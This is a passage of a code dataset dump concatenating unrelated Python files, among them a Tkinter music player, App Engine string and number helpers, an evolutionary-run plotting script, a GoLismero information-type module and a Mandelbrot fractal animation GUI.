10')\r\nstatus_bar.pack(side=BOTTOM, fill=X)\r\n\r\n\r\nsub_menu = Menu(menu_bar, tearoff=0)\r\nmenu_bar.add_cascade(label='Help', menu=sub_menu)\r\n\r\ndef about_us():\r\n tkinter.messagebox.showinfo('About Us', 'This is an app built with python, that uses your music files on your local machine and plays them. 
You can visit the developers portfolio page for more info, philipcodes.pythonanywhere.com')\r\n\r\n\r\nsub_menu.add_command(label='About_Us', command=about_us)\r\n\r\n\r\n\r\n\r\n\r\nplaylist=[]\r\n# playlist contains the full path + the filename\r\n# current_playlist- contains just the filename\r\n# filepath contains where the file is and to be played\r\n\r\n\r\n\r\n\r\n\r\ndef add_to_playlist(filename):\r\n filename= os.path.basename(filename)\r\n index= 0\r\n current_playlist.insert(index, filename)\r\n playlist.insert(index,filename_path)\r\n index +=1\r\n\r\ndef delete_song():\r\n selected_song = current_playlist.curselection()\r\n\r\n selected_song = int(selected_song[0])\r\n current_playlist.delete(selected_song)\r\n playlist.pop(selected_song)\r\n\r\n\r\n\r\nleft_frame= Frame(root,background= 'grey')\r\nleft_frame.pack(side= LEFT, pady= 50)\r\n\r\ncurrent_playlist = Listbox(left_frame,background= 'grey')\r\ncurrent_playlist.pack()\r\n\r\nadd = ttk.Button(left_frame, text='Add', command= browse_file)\r\nadd.pack(side= LEFT)\r\n\r\ndel_but= ttk.Button(left_frame, text='Del', command= delete_song)\r\ndel_but.pack()\r\n\r\n\r\n\r\nright_frame=Frame(root, background= 'grey')\r\nright_frame.pack()\r\n\r\ntop_frame=Frame(right_frame,background= 'grey')\r\ntop_frame.pack(pady=30)\r\n\r\n\r\n\r\n\r\n\r\n\r\nmiddle = Frame(right_frame,background= 'grey',relief=SUNKEN)\r\nmiddle.pack(padx=30, pady=30)\r\ncurrent_time_label=ttk.Label(middle, text='Run Time- --:--', relief= GROOVE, font= 'Arial 10',background= 'grey')\r\ncurrent_time_label.grid(row=0, column= 0)\r\n\r\nlength_label = ttk.Label(middle, text='Total Length- --:--', relief= GROOVE, font= 'Arial 10',background= 'grey')\r\nlength_label.grid(row=0, column =2)\r\nplay_image = PhotoImage(file='images/interface (1).png')\r\n\r\n\r\ndef show_detail(play_song):\r\n file_data = os.path.splitext(play_song)\r\n\r\n\r\n if file_data[1] == '.mp3':\r\n audio = MP3(play_song)\r\n total_length = audio.info.length\r\n else:\r\n a = mixer.Sound(play_song)\r\n total_length = a.get_length()\r\n min,sec = divmod(total_length, 60)\r\n # it divides total_lenght by 60 and it returns and the mins and sec the reminder to sec\r\n min = round(min)\r\n sec = round(sec)\r\n time_format = '{:02d}:{:02d}'.format(min, sec)\r\n length_label['text'] = 'Total Length' + '- ' + time_format\r\n t1= threading.Thread(target=start_count, args=(total_length,))\r\n t1.start()\r\n\r\n\r\ndef start_count(t):\r\n global paused\r\n #Mixer.music stops the music, it returns false when we press pause button\r\n run_time= 0\r\n while run_time= self._food_need and water >= self._water_need:\r\n self._weight += self._growth_rate\r\n self._days_growing += 1\r\n self._update_status()\r\n\r\n","sub_path":"sheep_class.py","file_name":"sheep_class.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"472680084","text":"#=======================================================================#\n# USER NAME: Thach Le \n# FILE NAME: 061-piling-up.py\n# FILE PATH: /E/thach-working/hackerrank/python-skill/061-piling-up.py\n#=======================================================================#\n# import library\nfrom collections import deque\n\ndef main():\n\tfor _ in range(int(input())):\n\t\t_, lst_input = input(), list(map(int, input().split()))\n\t\tmin_idex = lst_input.index(min(lst_input))\n\t\tleft = lst_input[:min_idex]\n\t\tright = lst_input[min_idex:]\n\t\tprint(\"Yes\" if left == 
sorted(left, reverse=True) and right == sorted(right) else \"No\")\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"python-skill/061-piling-up-hackerrank.py","file_name":"061-piling-up-hackerrank.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"2644724","text":"\"\"\"\r\nAuthor: Nguyen Tan Loc\r\nDate: 7/10/2021\r\nProblem:\r\nWrite a program that inputs a text file. The program should print the unique\r\nwords in the file in alphabetical order.\r\n\r\nSolution:\r\n\r\n ....\r\n\"\"\"\r\nunique = []\r\n\r\nwith open(\"bai.txt\", \"r\") as file:\r\n lines = file.readlines()\r\n for line in lines:\r\n words = line.split()\r\n for word in words:\r\n word = word.strip()\r\n if word not in unique:\r\n unique.append(word)\r\nunique = sorted(unique)\r\nprint(unique)","sub_path":"NguyenTanLoc_43807_CH05/project/5.7/Page_166_Project_07.py","file_name":"Page_166_Project_07.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"59228557","text":"import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nfname = 'thumbsup'\ncmap = 'gist_stern'\nt1 = mpimg.imread('t'+fname+'.jpg')\nfig = plt.figure(frameon=False)\nax = plt.Axes(fig,[0.,0.,1.,1.])\nax.set_axis_off()\nfig.add_axes(ax)\nax.imshow(t1[:,:,0],cmap=cmap)\nfig.savefig('T2'+fname+'.png',bbox_inches='tight',pad_inches=0)\n","sub_path":"submission/dtrumpimg.py","file_name":"dtrumpimg.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"351960172","text":"\n# **** Warren's App Engine Toolkit (WAET), version 1.2.0\n#\n# These are functions and procedures used for augmenting Google App Engine. Unfortunately, they have\n# to be inline with the rest of the code due to Python's TERRIBLE import and include functionality. Sorry.\n\n# Bring in Warren's App Engine Toolkit\n#from waet1_2_1 import clientscreenunit\n#from waet1_2_1 import limit_to_length\n#from waet1_2_1 import dropdownfromset\n#from waet1_2_1 import parseit\n#from waet1_2_1 import coolprint\n#from waet1_2_1 import coolscan\n\nclass clientscreenunit:\n def __init__(self, displayname, emailaddress, fullname, leadinghtml, lagginghtml):\n \"\"\"Class for passing all the relevant data to the client screen\n (Required since App Engine is on Django 0.96. 
This wouldn't be necessary in a later version of Django)\"\"\"\n \n self.displayname = displayname\n self.emailaddress = emailaddress\n self.fullname = fullname\n self.leadinghtml = leadinghtml\n self.lagginghtml = lagginghtml\n pass \n\ndef limit_to_length(strinput, length_to_limit):\n \"limit a string to a given length\" \n \n stroutput = strinput\n if len(strinput) > length_to_limit:\n stroutput = strinput[:length_to_limit]\n return stroutput\n\n\ndef dropdownfromset(settouse, selectedvalue, idtouse):\n \"build an HTML drop down from a Python set\"\n \n # NOTE: the original markup was lost; the select/option tags below are an assumed reconstruction\n strtemp = \"<select id='\" + idtouse + \"'>\"\n for itemtouse in settouse:\n if itemtouse == selectedvalue:\n strtemp = strtemp + \"<option value='\" + itemtouse + \"' selected='selected'>\" + itemtouse + \"</option>\"\n else:\n strtemp = strtemp + \"<option value='\" + itemtouse + \"'>\" + itemtouse + \"</option>\"\n strtemp = strtemp + \"</select>\"\n return strtemp\n\n\n\ndef parseit(full_string, find_string, parameters):\n \"\"\"Function for finding a string inside of another string\n Parameters:\n 'rfi' = right-hand part of the string, first instance of sub-string, inclusive of the target string (DEFAULT)\n 'rfx' = right-hand part of the string, first instance of sub-string, exclusive of target\n 'rli' = right-hand part of the string, last instance of sub-string, inclusive of the target string\n 'rlx' = right-hand part of the string, last instance of sub-string, exclusive of target\n 'lfi' = left-hand part of the string, first instance of sub-string, inclusive of the target string\n 'lfx' = left-hand part of the string, first instance of sub-string, exclusive of target\n 'lli' = left-hand part of the string, last instance of sub-string, inclusive of the target string\n 'llx' = left-hand part of the string, last instance of sub-string, exclusive of target\"\"\"\n if parameters == 'rfx':\n return_string = full_string[full_string.find(find_string)+len(find_string):]\n elif parameters == 'rli':\n return_string = full_string[full_string.rfind(find_string):]\n elif parameters == 'rlx':\n return_string = full_string[full_string.rfind(find_string)+len(find_string):]\n elif parameters == 'lfi':\n return_string = full_string[:full_string.find(find_string)+len(find_string)]\n elif parameters == 'lfx':\n return_string = full_string[:full_string.find(find_string)]\n elif parameters == 'lli':\n return_string = full_string[:full_string.rfind(find_string)+len(find_string)]\n elif parameters == 'llx':\n return_string = full_string[:full_string.rfind(find_string)]\n else:\n return_string = full_string[full_string.find(find_string):]\n return return_string\n \n\ndef tween(full_string, find_string_left = \"\", find_string_right = \"\"):\n \"\"\"Function for finding a string inside of another string. Use a blank string to indicate the start or end of the string.\"\"\"\n if find_string_left == '' or find_string_left == None:\n return_string = full_string[:full_string.find(find_string_right)] \n elif find_string_right == '' or find_string_right == None:\n return_string = full_string[full_string.find(find_string_left)+len(find_string_left):] \n else:\n new_full_string = full_string[full_string.find(find_string_left)+len(find_string_left):] \n return_string = new_full_string[:new_full_string.find(find_string_right)] \n return return_string\n
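\n# usage sketch (illustrative values): parseit(\"abcXdefXghi\", \"X\", \"rfx\") -> \"defXghi\";\n# parseit(\"abcXdefXghi\", \"X\", \"llx\") -> \"abcXdef\"; tween(\"a[b]c\", \"[\", \"]\") -> \"b\"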
\n\ndef coolprint (what_number, places):\n \"Function for printing numbers in a cool way (i.e. '3.2M' = 3,200,000; '1.1B' = 1,100,000,000, etc.)\"\n try:\n first_attempt = float(what_number)\n except (ValueError):\n what_number = 0\n\n if abs(what_number) > 1000000000:\n return_string = str(round(float(what_number)/1000000000,places)) + \"B\"\n elif abs(what_number) > 1000000:\n return_string = str(round(float(what_number)/1000000,places)) + \"M\"\n elif abs(what_number) > 1000:\n return_string = str(round(float(what_number)/1000,places)) + \"K\"\n else:\n return_string = str(round(float(what_number),places))\n return return_string\n\n\n\ndef coolscan(string_to_scan):\n \"Function that acts as a semi-inverse to coolprint. This function interprets a coolprint number back to a floating point\"\n \n strtemp = string_to_scan.strip()\n if len(strtemp) < 1:\n return 0\n\n iNegative = 1\n if strtemp[0] == \"(\" and strtemp[len(strtemp)-1] == \")\":\n iNegative = -1\n strtemp = strtemp[1:len(strtemp)-1]\n if strtemp[0] == \"-\":\n iNegative = -1\n strtemp = strtemp[1:]\n\n if strtemp[len(strtemp)-1] == \"B\":\n try:\n what_number = iNegative * float(strtemp[:len(strtemp)-1]) * 1000000000\n except (ValueError):\n what_number = 0\n elif strtemp[len(strtemp)-1] == \"M\":\n try:\n what_number = iNegative * float(strtemp[:len(strtemp)-1]) * 1000000\n except (ValueError):\n what_number = 0\n elif strtemp[len(strtemp)-1] == \"K\":\n try:\n what_number = iNegative * float(strtemp[:len(strtemp)-1]) * 1000\n except (ValueError):\n what_number = 0\n else:\n try:\n what_number = iNegative * float(strtemp)\n except (ValueError):\n what_number = 0 \n return what_number\n\n\n# **** \n# Warren's App Engine Toolkit (WAET)\n# END ","sub_path":"waet1_2_0.py","file_name":"waet1_2_0.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} {"seq_id":"158960176","text":"import sys\nimport io\n\nimport pytest\n\nfrom ..parser import HabrParser\n\n\nclass TestHabrParser:\n parser = HabrParser()\n file = None\n\n testdata_forbidden_tags = [\n ('script'), ('style')\n ]\n\n testdata_parsedata = [\n ('',\n [''], []),\n ('',\n [''], []),\n ('whoami',\n ['whoami™'], []),\n ('&lt;i&gt;',\n ['&lt;i&gt;'], [''])\n ]\n\n @pytest.mark.parametrize(\"tag\", testdata_forbidden_tags)\n def test_inside_forbidden_tag(self, tag):\n self.parser.file = sys.stdout\n # Dummy data - needed to avoid Exception on get_starttag_text\n self.parser.feed('')\n\n self.parser.handle_starttag(tag, [])\n assert self.parser.inside_forbidden_tag\n self.parser.handle_endtag(tag)\n assert not self.parser.inside_forbidden_tag\n\n @pytest.mark.parametrize(\"html, expected_contains, expected_contains_not\", testdata_parsedata)\n def test_parse_data(self, html, expected_contains, expected_contains_not):\n output_buffer = io.StringIO()\n self.parser.set_output_buffer(output_buffer)\n\n self.parser.feed(html)\n\n output_buffer.seek(0)\n\n for substring in expected_contains:\n assert substring in output_buffer.read()\n\n for substring in expected_contains_not:\n assert substring not in output_buffer.read()\n\n output_buffer.close()\n","sub_path":"proxy/tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} {"seq_id":"325849097","text":"import heapq\nimport os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom data import DataManager\nfrom src.Analysis 
import Logger\n\n\"\"\"\nfile which reads generation by generation data containing info on the \naccuracy of every evaluated network, as well as their scores on subsequent objectives.\n\nData plotter aggregates each generations scores into one, either by using max, or average, or average of the top n\nData plotter then plots these aggregated scores at each generation for multiple runs\n\"\"\"\n\nplot = None\n\n\ndef plot_objectives_at_gen(generation):\n if len(Logger.generations) <= generation:\n return\n generation = Logger.generations[generation]\n acc = generation.accuracies\n second = generation.second_objective_values\n third = generation.third_objective_values\n\n if second is None or len(second) == 0:\n plot_histogram(acc)\n elif third is None or len(third) == 0:\n plot_acc_vs_second(acc, second)\n else:\n pass\n\n\ndef plot_acc_vs_second(acc, second):\n global plot\n plt.scatter(acc, second)\n plt.show()\n\n\ndef plot_histogram(acc):\n plt.hist(acc, bins=20)\n plt.show()\n\n\ndef plot_generations():\n for generation in Logger.generations:\n plot_objectives_at_gen(generation.generation_number)\n\n\ndef get_gens_and_fitnesses(aggregation_type='max', fitness_index=0, num_top=5):\n gens = list(range(0, len(Logger.generations)))\n if aggregation_type == 'max':\n fitness = [gen.get_max_of_objective(fitness_index) for gen in Logger.generations]\n elif aggregation_type == 'avg':\n fitness = [gen.get_average_of_objective(fitness_index) for gen in Logger.generations]\n elif aggregation_type == 'top':\n fitness = []\n for gen in Logger.generations:\n fitness.append(sum(heapq.nlargest(num_top, gen.objectives[fitness_index])) / num_top)\n else:\n raise ValueError('Only aggregation types allowed are avg and max, received' + str(aggregation_type))\n\n return gens, fitness\n\n\ndef plot_all_generations(aggregation_type='max', fitness_index=0, run_name='unnamed run'):\n gens, fitness = get_gens_and_fitnesses(aggregation_type, fitness_index)\n\n plt.ylim(0, 100)\n plt.scatter(gens, fitness)\n plt.plot(np.unique(gens), np.poly1d(np.polyfit(gens, fitness, 1))(np.unique(gens)))\n plt.title(aggregation_type + ' value of objectives ' + str(fitness_index) + ' per generation for ' + run_name)\n plt.show()\n\n\ndef get_all_run_names():\n runs = set()\n for subdir, dirs, files in os.walk(os.path.join(DataManager.get_data_folder(), \"runs\")):\n sub = subdir.split(\"runs\")[1][1:].split(\"\\\\\")[0].split(\"/\")[0]\n if sub == \"\":\n continue\n runs.add(sub)\n\n return runs\n\n\ndef get_all_runs(aggregation_type='max', num_top=5, fitness_index=0, max_gens=1000):\n runs = get_all_run_names()\n\n runs_data = {}\n\n for run in runs:\n try:\n Logger.load_date_from_log_file(run, summary=False)\n gens, fitness = get_gens_and_fitnesses(aggregation_type, fitness_index, num_top=num_top)\n if len(gens) > max_gens:\n gens = gens[:max_gens]\n fitness = fitness[:max_gens]\n\n runs_data[run] = (gens, fitness)\n except:\n pass\n\n return runs_data\n\n\ndef get_run_groups(aggregation_type='max', num_top=5, fitness_index=0, max_gens=1000, include_deterministic_runs=True,\n include_cross_species_runs=True):\n runs = get_all_runs(aggregation_type=aggregation_type, num_top=num_top, fitness_index=fitness_index,\n max_gens=max_gens)\n groups = {}\n for run in runs.keys():\n group_run_name = get_run_group_name(run, include_deterministic_runs, include_cross_species_runs)\n if group_run_name not in groups:\n groups[group_run_name] = []\n groups[group_run_name].append(runs[run])\n\n return groups\n\n\ndef get_run_group_name(run_name, 
include_deterministic_runs=True, include_cross_species_runs=True):\n run_name = run_name.replace(\"da\", \"$\")\n\n group_run_name = run_name.replace(\"_d\", \"\") if include_deterministic_runs else run_name\n group_run_name = group_run_name.replace(\"_c\", \"\") if include_cross_species_runs else group_run_name\n\n group_run_name = group_run_name.replace(\"$\", \"da\")\n\n if group_run_name[-1].isdigit():\n group_run_name = group_run_name[:-1]\n\n if group_run_name in name_overrides:\n return name_overrides[group_run_name]\n\n return group_run_name\n\n\ndef get_run_boundries(aggregation_type='max', num_top=5, fitness_index=0, max_gens=1000,\n include_deterministic_runs=True, smooth_boundries=True):\n run_groups = get_run_groups(aggregation_type=aggregation_type, num_top=num_top, fitness_index=fitness_index,\n max_gens=max_gens, include_deterministic_runs=include_deterministic_runs)\n boundires = {}\n counts = {}\n\n for group_name in run_groups.keys():\n group = run_groups[group_name]\n fitnesses = [f for (g, f) in group]\n\n if len(fitnesses) < 2:\n \"\"\"need at least 2 runs to get boundires\"\"\"\n continue\n \"\"\"can get a boundry up till the second longest run, need 2 for a boundry\"\"\"\n max_num_gens = len(sorted(fitnesses, key=lambda x: len(x))[-2])\n mins = []\n maxes = []\n\n for i in range(max_num_gens):\n elements = [x[i] for x in fitnesses if len(x) > i]\n mins.append(min(elements))\n maxes.append(max(elements))\n\n if smooth_boundries:\n mins = get_rolling_averages(mins)\n maxes = get_rolling_averages(maxes)\n\n boundires[group_name] = (mins, maxes)\n counts[group_name] = len(group)\n return boundires, counts\n\n\ndef plot_all_runs(aggregation_type='max', num_top=5, fitness_index=0, max_gens=1000, show_data=False,\n stay_at_max=True, line_graph=True, show_best_fit=False, show_smoothed_data=False,\n show_boundires=True, smooth_boundries=True, show_data_in_boundries=True,\n colour_group_run_lines_same=True):\n colours = {}\n if show_boundires:\n boundires, counts = get_run_boundries(aggregation_type=aggregation_type, num_top=num_top,\n fitness_index=fitness_index, max_gens=max_gens,\n smooth_boundries=smooth_boundries)\n for group_name in boundires.keys():\n mins, maxs = boundires[group_name]\n gens = [x for x in range(len(mins))]\n\n plot = plt.fill_between(gens, mins, maxs, alpha=0.4, label=group_name + \", n=\" + repr(counts[group_name]))\n colours[group_name] = [max(min(x * 1.5, 1), 0) for x in plot.get_facecolor()[0]]\n\n runs = get_all_runs(aggregation_type=aggregation_type, num_top=num_top, fitness_index=fitness_index,\n max_gens=max_gens)\n labels_used = set()\n for run in runs.keys():\n if show_boundires and not show_data_in_boundries:\n group_name = get_run_group_name(run)\n if group_name in boundires:\n continue\n gens, fitness = runs[run]\n\n aggregated = None\n if stay_at_max:\n aggregated = [max(fitness[:i + 1]) for i in range(len(fitness))]\n elif show_best_fit:\n gens = np.unique(gens)\n aggregated = np.poly1d(np.polyfit(gens, fitness, 1))(np.unique(gens))\n elif show_smoothed_data:\n aggregated = get_rolling_averages(fitness)\n group_name = get_run_group_name(run)\n colour = None\n if colour_group_run_lines_same:\n if show_boundires and show_data_in_boundries:\n if group_name in colours:\n colour = colours[group_name]\n if show_data:\n if colour_group_run_lines_same:\n label = group_name if group_name not in labels_used else None\n labels_used.add(label)\n else:\n label = run\n\n if line_graph:\n p = plt.plot(gens, fitness, label=label, c=colour)\n else:\n p 
= plt.scatter(gens, fitness, label=label, c=colour)\n if aggregated is not None:\n plt.plot(gens, aggregated, c=p[0].get_color())\n\n else:\n if aggregated is not None:\n plt.plot(gens, aggregated, label=run, c=colour)\n\n handles, labels = plt.gca().get_legend_handles_labels()\n plt.gca().legend(handles, labels)\n\n plt.set_cmap('gray')\n\n plt.xlabel(\"Generation\")\n ylabel = \"fitness \" + repr(fitness_index) if fitness_index > 0 else \"accuracy (%)\"\n plt.ylabel(ylabel)\n title = aggregation_type + (\" \" + repr(num_top) if aggregation_type == \"top\" else \"\") + \" fitness\"\n plt.title(\"Top 5 accuracy of base and ModMax\")\n\n # plt.show()\n plt.savefig('MMvsBase', dpi=300)\n\n\ndef get_rolling_averages(data, alpha=0.65):\n smoothed = []\n for point in data:\n if len(smoothed) == 0:\n smoothed.append(point)\n else:\n a = alpha if len(smoothed) > 10 else pow(alpha, 1.5)\n smooth = smoothed[-1] * a + point * (1 - a)\n smoothed.append(smooth)\n return smoothed\n\n\nname_overrides = {\"mm\": \"Modmax cdn\", \"mms\": \"Elite cdn\", \"mms_10E\": \"Elite cdn 10E\", \"base\": \"cdn\",\n \"base_10E\": \"cdn 10E\", \"spc\": \"SPCDN\", \"base_da\": \"DACDN\", \"mms_da\": \"Elite DACDN\",\n \"max\": \"max fitness aggregation cdn\", \"modret\": \"module retention cdn\",\n \"mm_globmut\": \"ModMax with Global Mutation Adjustment\",\n \"mms_globmut\": \"Elite cdn with Global Mutation Adjustment\",\n \"mm_breed\": \"ModMax cdn with Node Breeding\", \"mms_breed\": \"Elite cdn with Node Breeding\"}\n\nif __name__ == \"__main__\":\n # style.use('fivethirtyeight')\n plot_all_runs(aggregation_type=\"top\", num_top=5, show_data=True, show_best_fit=False, show_smoothed_data=False,\n stay_at_max=False, show_boundires=True, smooth_boundries=False, show_data_in_boundries=True,\n colour_group_run_lines_same=True, max_gens=30)\n","sub_path":"src/Analysis/EvolutionaryDataPlotter.py","file_name":"EvolutionaryDataPlotter.py","file_ext":"py","file_size_in_byte":10172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"494175485","text":"li = list(map(int, input().split()))\r\n\r\nascending = [1, 2, 3, 4, 5, 6, 7, 8]\r\ndescending = [8, 7, 6, 5, 4, 3, 2, 1]\r\nif li == ascending:\r\n print('ascending')\r\nelif li == descending:\r\n print('descending')\r\nelse:\r\n print('mixed')\r\n","sub_path":"week1/1/1-1_신예준_20210705.py","file_name":"1-1_신예준_20210705.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"51493368","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport utils.widgets\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('clients', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='client',\n name='phone_cell',\n field=utils.widgets.PhoneNumberField(blank=True, default='', max_length=20, verbose_name='Cell Phone'),\n ),\n migrations.AlterField(\n model_name='client',\n name='phone_home',\n field=utils.widgets.PhoneNumberField(blank=True, default='', max_length=20, verbose_name='Home Phone'),\n ),\n migrations.AlterField(\n model_name='client',\n name='phone_work',\n field=utils.widgets.PhoneNumberField(blank=True, default='', max_length=20, verbose_name='Work Phone'),\n ),\n 
]\n","sub_path":"irsexpress2/apps/clients/migrations/0002_auto_20151210_0937.py","file_name":"0002_auto_20151210_0937.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"318936938","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nInformation types.\n\"\"\"\n\n__license__ = \"\"\"\nGoLismero 2.0 - The web knife - Copyright (C) 2011-2013\n\nAuthors:\n Daniel Garcia Garcia a.k.a cr0hn | cr0hn<@>cr0hn.com\n Mario Vilas | mvilas<@>gmail.com\n\nGolismero project site: https://github.com/golismero\nGolismero project mail: golismero.project<@>gmail.com\n\nThis program is free software; you can redistribute it and/or\nmodify it under the terms of the GNU General Public License\nas published by the Free Software Foundation; either version 2\nof the License, or (at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program; if not, write to the Free Software\nFoundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\"\"\"\n\n__all__ = [\"Information\"]\n\nfrom .. import Data\n\n\n#------------------------------------------------------------------------------\nclass Information(Data):\n \"\"\"\n Base class for informational results.\n \"\"\"\n\n\n #--------------------------------------------------------------------------\n #\n # Types of Infomation results\n #\n #--------------------------------------------------------------------------\n\n INFORMATION_UNKNOWN = 0 # Not a real value!\n\n # Data\n INFORMATION_HTML = 1000 # HTML source code\n INFORMATION_FORM = 1001 # HTML form\n INFORMATION_PLAIN_TEXT = 1002 # Text file\n INFORMATION_BINARY = 1003 # Binary file of unknown type\n ##INFORMATION_EXECUTABLE = 1004 # Executable file (various platforms)\n ##INFORMATION_IMAGE = 1005 # Image file\n ##INFORMATION_VIDEO = 1006 # Video file\n ##INFORMATION_PDF = 1007 # PDF file\n ##INFORMATION_FLASH = 1008 # Flash file\n ##INFORMATION_DOCUMENT = 1009 # Document file (various formats)\n\n # Assets\n INFORMATION_USERNAME = 1100 # Username\n INFORMATION_PASSWORD = 1101 # Password\n ##INFORMATION_DATABASE_DUMP = 1102 # Database dump in SQL format\n\n # Protocol captures\n INFORMATION_HTTP_REQUEST = 1200 # HTTP request\n INFORMATION_HTTP_RAW_REQUEST = 1201 # Raw HTTP request\n INFORMATION_HTTP_RESPONSE = 1202 # HTTP response\n INFORMATION_DNS_REGISTER = 1212 # DNS responses\n\n # Fingerprints\n INFORMATION_WEB_SERVER_FINGERPRINT = 1300 # HTTP server fingerprint\n ##INFORMATION_WEB_APP_FINGERPRINT = 1301 # Web application fingerprint\n ##INFORMATION_SERVICE_FINGERPRINT = 1302 # Network service fingerprint\n INFORMATION_OS_FINGERPRINT = 1303 # Operating system fingerprint\n INFORMATION_PORTSCAN = 1304 # Portscan results\n INFORMATION_TRACEROUTE = 1305 # Traceroute results\n INFORMATION_GEOLOCATION = 1306 # Geographic location\n\n\n #----------------------------------------------------------------------\n\n data_type = Data.TYPE_INFORMATION\n information_type = 
INFORMATION_UNKNOWN\n","sub_path":"golismero/api/data/information/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"541713128","text":"# import some modules\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom itertools import cycle\nimport matplotlib.colors as clr\nimport matplotlib.colors\nfrom tkinter import *\nfrom matplotlib import animation\nfrom tkinter import colorchooser\nfrom numba import jit\n\ndef fractal(real_min, real_max, imaginary_min, imaginary_max, real_points, imaginary_points, max_iterations=200,\n max_infinity_number=4):\n image = np.zeros((realPoints, imaginaryPoints))\n real_part, imaginary_part = np.mgrid[real_min:real_max:(real_points * 1j),\n imaginary_min:imaginary_max:(imaginary_points * 1j)]\n\n complex_number = real_part + 1j * imaginary_part\n new_complex = np.zeros_like(complex_number)\n\n for i in range(max_iterations):\n new_complex = new_complex ** 2 + complex_number\n\n mask = (np.abs(new_complex) > max_infinity_number) & (image == 0)\n\n image[mask] = i\n\n new_complex[mask] = np.nan\n return -image.T\n\n\ndef init():\n return plt.gca()\n\n\ndef animation(i):\n if i > maxFrames // 2:\n plt.imshow(images[maxFrames // 2 - i], cmap='flag')\n print(i)\n return\n real_center = -0.793191078177363\n imaginary_center = 0.16093721735804\n\n zoom = (i / maxFrames * 2) ** 3 * maxZoom + 1\n scale = 1 / zoom\n new_real_min = (realMin - real_center) * scale + real_center\n new_imaginary_min = (imaginaryMin - imaginary_center) * scale + imaginary_center\n new_real_max = (realMax - real_center) * scale + real_center\n new_imaginary_max = (imaginaryMax - imaginary_center) * scale + imaginary_center\n\n image = fractal(new_real_min, new_real_max, new_imaginary_min, new_imaginary_max, realPoints, imaginaryPoints)\n plt.imshow(image, cmap='flag')\n images.append(image)\n print(i)\n return plt.gca()\n\n\ndef get_gif():\n anim = matplotlib.animation.FuncAnimation(figure, animation, init_func=init, frames=maxFrames, interval=50)\n anim.save('myGif.gif', writer=writer)\n\n\ndef get_picture():\n image = fractal(realMin, realMax, imaginaryMin, imaginaryMax, realPoints, imaginaryPoints, max_iterations,\n maxInfinityNumber)\n plt.xticks([])\n plt.yticks([])\n plt.imshow(image, cmap=cmap, interpolation='none')\n plt.show()\n\n\ndef update_frames(index):\n if index > maxFrames - 1:\n index = 0\n frame = gif_frames[index]\n index += 1\n label.configure(image=frame)\n label.after(50, update_frames, index)\n\n\ndef choose_color1():\n a = colorchooser.askcolor()[1]\n global color1\n color1 = a\n color_button.config(background=color1)\n\n global cmap\n\n colorpoints = [(1 - (1 - q) ** 4, c) for q, c in zip(np.linspace(0, 1, 20),\n cycle([color1, '#000000',\n color2, ]))]\n cmap = clr.LinearSegmentedColormap.from_list('mycmap',\n colorpoints, N=2048)\n\n\ndef choose_color2():\n a = colorchooser.askcolor()[1]\n global color2\n color2 = a\n color_button_two.config(background=color2)\n\n global cmap\n\n colorpoints = [(1 - (1 - q) ** 4, c) for q, c in zip(np.linspace(0, 1, 20),\n cycle([color1, '#000000',\n color2, ]))]\n cmap = clr.LinearSegmentedColormap.from_list('mycmap',\n colorpoints, N=2048)\n\n\ndef tkinter_window():\n global label\n global gif_frames\n\n root = Tk()\n width = root.winfo_screenwidth()\n height = root.winfo_screenheight()\n\n width = width // 2 - 200\n height = height // 2 - 200\n\n root.geometry('400x400+{}+{}'.format(width, 
height))\n root.title('Редактор скринсейвера')\n\n gif_frames = [\n PhotoImage(master=root, file=r'C:\\Users\\ukolo\\PycharmProjects\\fractlas\\mygif.gif', format='gif -index %i' % (i)) for i in range(maxFrames)]\n\n global color_button\n color_button = Button(text='Выбор цвета 2', command=choose_color1, master=root, background=color1)\n color_button.place(x=300, y=350)\n\n global color_button_two\n color_button_two = Button(text='Выбор цвета 1', command=choose_color2, master=root, background=color2)\n color_button_two.place(x=200, y=350)\n\n image_button = Button(text='Получить картинку', command=get_picture, master=root)\n image_button.place(x=10, y=350)\n\n gif_button = Button(text='Получить новую гиф', command=get_gif, master=root)\n gif_button.place(x=10, y=320)\n\n label = Label(root, width=380, height=300)\n label.place(x=10, y=0)\n root.after(0, update_frames, 0)\n root.mainloop()\n\n\n# Writer settings\nwriter = matplotlib.animation.ImageMagickWriter(fps=5, metadata=dict(artist='Me'), bitrate=1800)\n\n# Settings for image\nrealMin = 